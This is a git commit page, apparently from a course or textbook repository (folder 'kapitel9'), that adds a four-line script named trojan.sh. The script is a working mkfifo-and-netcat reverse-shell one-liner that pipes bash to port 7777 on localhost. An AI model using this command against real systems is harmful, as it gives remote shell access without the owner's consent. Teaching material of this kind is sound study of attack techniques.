Inital commit
This commit is contained in:
4
kapitel9/trojan.sh
Normal file
4
kapitel9/trojan.sh
Normal file
@@ -0,0 +1,4 @@
|
||||
#!/bin/bash
|
||||
mkfifo /tmp/f
|
||||
/bin/bash 0</tmp/f | nc localhost 7777 1>/tmp/f && rm /tmp/f
|
||||
|
Reference in New Issue
Block a user